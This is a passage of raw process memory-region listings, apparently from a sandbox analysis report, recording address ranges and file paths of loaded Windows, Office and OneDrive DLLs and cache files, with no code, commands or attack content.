"uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 539 start_va = 0x71680000 end_va = 0x716d1fff monitored = 0 entry_point = 0x716a8290 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\SysWOW64\\BCP47Langs.dll" (normalized: "c:\\windows\\syswow64\\bcp47langs.dll") Region: id = 540 start_va = 0x716e0000 end_va = 0x71811fff monitored = 0 entry_point = 0x7174bf60 region_type = mapped_file name = "windows.globalization.dll" filename = "\\Windows\\SysWOW64\\Windows.Globalization.dll" (normalized: "c:\\windows\\syswow64\\windows.globalization.dll") Region: id = 541 start_va = 0x71e30000 end_va = 0x71e5bfff monitored = 0 entry_point = 0x71e45ee0 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\SysWOW64\\fwbase.dll" (normalized: "c:\\windows\\syswow64\\fwbase.dll") Region: id = 542 start_va = 0x71e90000 end_va = 0x71f12fff monitored = 0 entry_point = 0x71eb37c0 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\SysWOW64\\dxgi.dll" (normalized: "c:\\windows\\syswow64\\dxgi.dll") Region: id = 543 start_va = 0x71f20000 end_va = 0x7206afff monitored = 0 entry_point = 0x71f81660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 544 start_va = 0x720d0000 end_va = 0x722e9fff monitored = 0 entry_point = 0x72165550 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\SysWOW64\\d3d11.dll" (normalized: "c:\\windows\\syswow64\\d3d11.dll") Region: id = 545 start_va = 0x73870000 end_va = 0x73a8bfff monitored = 0 entry_point = 0x73a3bc40 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll") Region: id = 546 start_va = 0x73c30000 end_va = 0x73c4afff monitored = 0 entry_point = 0x73c39050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 547 start_va = 0x73c50000 end_va = 0x73d1cfff monitored = 0 entry_point = 0x73ca29c0 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\SysWOW64\\twinapi.appcore.dll" (normalized: "c:\\windows\\syswow64\\twinapi.appcore.dll") Region: id = 548 start_va = 0x73ee0000 end_va = 0x73f71fff monitored = 0 entry_point = 0x73f20380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 549 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 550 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 551 start_va = 0x74120000 end_va = 0x7423efff monitored = 0 entry_point = 0x74165980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 552 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 553 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 554 start_va = 0x74360000 end_va = 0x743e3fff monitored = 0 entry_point = 0x74386220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 555 start_va = 0x743f0000 end_va = 0x74481fff monitored = 0 entry_point = 0x74428cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 556 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 557 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 558 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 559 start_va = 0x75e90000 end_va = 0x75eeefff monitored = 0 entry_point = 0x75e94af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 560 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 561 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 562 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 563 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 564 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 565 start_va = 0x76450000 end_va = 0x764adfff monitored = 0 entry_point = 0x76467470 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\SysWOW64\\FirewallAPI.dll" (normalized: "c:\\windows\\syswow64\\firewallapi.dll") Region: id = 566 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 567 start_va = 0x769b0000 end_va = 0x769c2fff monitored = 0 entry_point = 0x769b1d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 568 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 569 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 570 start_va = 0x76c00000 end_va = 0x76c04fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 571 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 572 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 573 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 574 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 575 start_va = 0x77050000 end_va = 0x77141fff monitored = 0 entry_point = 0x77088070 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 576 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 577 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 578 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 579 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 580 start_va = 0x7fe90000 end_va = 0x7fe9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe90000" filename = "" Region: id = 581 start_va = 0x7fea0000 end_va = 0x7feaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fea0000" filename = "" Region: id = 582 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 583 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 584 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 585 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 586 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 587 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 588 start_va = 0xc540000 end_va = 0xc54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c540000" filename = "" Region: id = 589 start_va = 0xc540000 end_va = 0xc632fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 590 start_va = 0xc540000 end_va = 0xc632fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 591 start_va = 0xc540000 end_va = 0xc632fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 592 start_va = 0xc540000 end_va = 0xc54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c540000" filename = "" Region: id = 593 start_va = 0xc540000 end_va = 0xc540fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c540000" filename = "" Region: id = 594 start_va = 0x15950000 end_va = 0x1856dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 595 start_va = 0xc550000 end_va = 0xc642fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 596 start_va = 0xc550000 end_va = 0xc642fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 597 start_va = 0xc550000 end_va = 0xc642fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 598 start_va = 0xc550000 end_va = 0xc642fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 599 start_va = 0xc550000 end_va = 0xc642fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 600 start_va = 0xc550000 end_va = 0xc642fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 601 start_va = 0x15950000 end_va = 0x1856ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 602 start_va = 0x68010000 end_va = 0x68017fff monitored = 0 entry_point = 0x68011e20 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\SysWOW64\\IconCodecService.dll" (normalized: "c:\\windows\\syswow64\\iconcodecservice.dll") Region: id = 603 start_va = 0x15950000 end_va = 0x15b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000015950000" filename = "" Region: id = 604 start_va = 0x15b50000 end_va = 0x1876ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 605 start_va = 0x15b50000 end_va = 0x1876ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 606 start_va = 0x15b50000 end_va = 0x15d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000015b50000" filename = "" Region: id = 607 start_va = 0xc550000 end_va = 0xc550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c550000" filename = "" Region: id = 608 start_va = 0xc550000 end_va = 0xc58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c550000" filename = "" Region: id = 609 start_va = 0xc590000 end_va = 0xc590fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c590000" filename = "" Region: id = 610 start_va = 0x12a80000 end_va = 0x12b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012a80000" filename = "" Region: id = 611 start_va = 0x76a30000 end_va = 0x76a89fff monitored = 0 entry_point = 0x76a57e70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\SysWOW64\\coml2.dll" (normalized: "c:\\windows\\syswow64\\coml2.dll") Region: id = 612 start_va = 0xc590000 end_va = 0xc597fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\windows.storage.dll.mui") Region: id = 613 start_va = 0x131c0000 end_va = 0x132bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000131c0000" filename = "" Region: id = 614 start_va = 0xc5a0000 end_va = 0xc5affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c5a0000" filename = "" Region: id = 615 start_va = 0xc5a0000 end_va = 0xc5affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c5a0000" filename = "" Region: id = 616 start_va = 0xc5a0000 end_va = 0xc5a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c5a0000" filename = "" Region: id = 617 start_va = 0x15d50000 end_va = 0x15ea1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000015d50000" filename = "" Region: id = 618 start_va = 0xc5a0000 end_va = 0xc5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c5a0000" filename = "" Region: id = 619 start_va = 0x15eb0000 end_va = 0x15faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000015eb0000" filename = "" Region: id = 620 start_va = 0xc5e0000 end_va = 0xc5e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 621 start_va = 0xc5f0000 end_va = 0xc5f0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{e23b5da4-e3a9-461b-8050-8e471867b572}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{E23B5DA4-E3A9-461B-8050-8E471867B572}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{e23b5da4-e3a9-461b-8050-8e471867b572}.2.ver0x0000000000000001.db") Region: id = 622 start_va = 0xc600000 end_va = 0xc603fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 623 start_va = 0xc610000 end_va = 0xc610fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{5c9e180f-34bb-4f92-8676-68c88e410c2b}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{5C9E180F-34BB-4F92-8676-68C88E410C2B}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{5c9e180f-34bb-4f92-8676-68c88e410c2b}.2.ver0x0000000000000001.db") Region: id = 624 start_va = 0xc620000 end_va = 0xc623fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 625 start_va = 0xc630000 end_va = 0xc630fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{0fa68fff-8d1f-4fcc-b2fc-0c8384cf8d69}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{0FA68FFF-8D1F-4FCC-B2FC-0C8384CF8D69}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{0fa68fff-8d1f-4fcc-b2fc-0c8384cf8d69}.2.ver0x0000000000000001.db") Region: id = 626 start_va = 0xc640000 end_va = 0xc643fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 627 start_va = 0xc650000 end_va = 0xc650fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3ec13d2a-c75f-4a0a-9855-0b415d40999c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{3EC13D2A-C75F-4A0A-9855-0B415D40999C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{3ec13d2a-c75f-4a0a-9855-0b415d40999c}.2.ver0x0000000000000001.db") Region: id = 628 start_va = 0xc660000 end_va = 0xc660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c660000" filename = "" Region: id = 629 start_va = 0x132c0000 end_va = 0x132fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000132c0000" filename = "" Region: id = 630 start_va = 0x15fb0000 end_va = 0x160affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000015fb0000" filename = "" Region: id = 631 start_va = 0x67f40000 end_va = 0x68008fff monitored = 0 entry_point = 0x67f53180 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\SysWOW64\\ntshrui.dll" (normalized: "c:\\windows\\syswow64\\ntshrui.dll") Region: id = 632 start_va = 0x67f20000 end_va = 0x67f3bfff monitored = 0 entry_point = 0x67f24720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 633 start_va = 0x67f10000 end_va = 0x67f1efff monitored = 0 entry_point = 0x67f13f00 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 634 start_va = 0xc660000 end_va = 0xc665fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oregres.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\oregres.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\oregres.dll") Region: id = 635 start_va = 0xc670000 end_va = 0xc673fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oregres.dll.mui" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\en-us\\oregres.dll.mui" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\en-us\\oregres.dll.mui") Region: id = 636 start_va = 0x67ee0000 end_va = 0x67f03fff monitored = 0 entry_point = 0x67ee4820 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 637 start_va = 0x67eb0000 end_va = 0x67ed2fff monitored = 0 entry_point = 0x67eb8940 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\SysWOW64\\winmmbase.dll" (normalized: "c:\\windows\\syswow64\\winmmbase.dll") Region: id = 638 start_va = 0xc660000 end_va = 0xc660fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c660000" filename = "" Region: id = 639 start_va = 0xc670000 end_va = 0xc676fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c670000" filename = "" Region: id = 640 start_va = 0x13420000 end_va = 0x13420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013420000" filename = "" Region: id = 641 start_va = 0x13680000 end_va = 0x13698fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013680000" filename = "" Region: id = 642 start_va = 0x13430000 end_va = 0x13437fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013430000" filename = "" Region: id = 643 start_va = 0x136a0000 end_va = 0x136a1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 644 start_va = 0x137c0000 end_va = 0x137c0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_16.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db") Region: id = 645 start_va = 0x67d20000 end_va = 0x67ea2fff monitored = 0 entry_point = 0x67d2c1ee region_type = mapped_file name = "filesyncshell.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncShell.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\filesyncshell.dll") Region: id = 646 start_va = 0x67ca0000 end_va = 0x67d10fff monitored = 0 entry_point = 0x67cdb707 region_type = mapped_file name = "msvcp120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\msvcp120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\msvcp120.dll") Region: id = 647 start_va = 0x67bb0000 end_va = 0x67c9dfff monitored = 0 entry_point = 0x67bc1a44 region_type = mapped_file name = "msvcr120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\msvcr120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\msvcr120.dll") Region: id = 648 start_va = 0x67b60000 end_va = 0x67babfff monitored = 0 entry_point = 0x67b895db region_type = mapped_file name = "telemetry.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\Telemetry.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\telemetry.dll") Region: id = 649 start_va = 0x74a30000 end_va = 0x74a35fff monitored = 0 entry_point = 0x74a31460 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 650 start_va = 0x701a0000 end_va = 0x703acfff monitored = 0 entry_point = 0x7028acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 651 start_va = 0x67b40000 end_va = 0x67b59fff monitored = 0 entry_point = 0x67b4b2f6 region_type = mapped_file name = "loggingplatform.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\LoggingPlatform.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\loggingplatform.dll") Region: id = 652 start_va = 0x700d0000 end_va = 0x7016afff monitored = 0 entry_point = 0x7010f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 653 start_va = 0x67b30000 end_va = 0x67b37fff monitored = 0 entry_point = 0x67b31740 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\SysWOW64\\wsock32.dll" (normalized: "c:\\windows\\syswow64\\wsock32.dll") Region: id = 654 start_va = 0x67b20000 end_va = 0x67b2cfff monitored = 0 entry_point = 0x67b23520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 655 start_va = 0x67ab0000 end_va = 0x67b16fff monitored = 0 entry_point = 0x67acb610 region_type = mapped_file name = 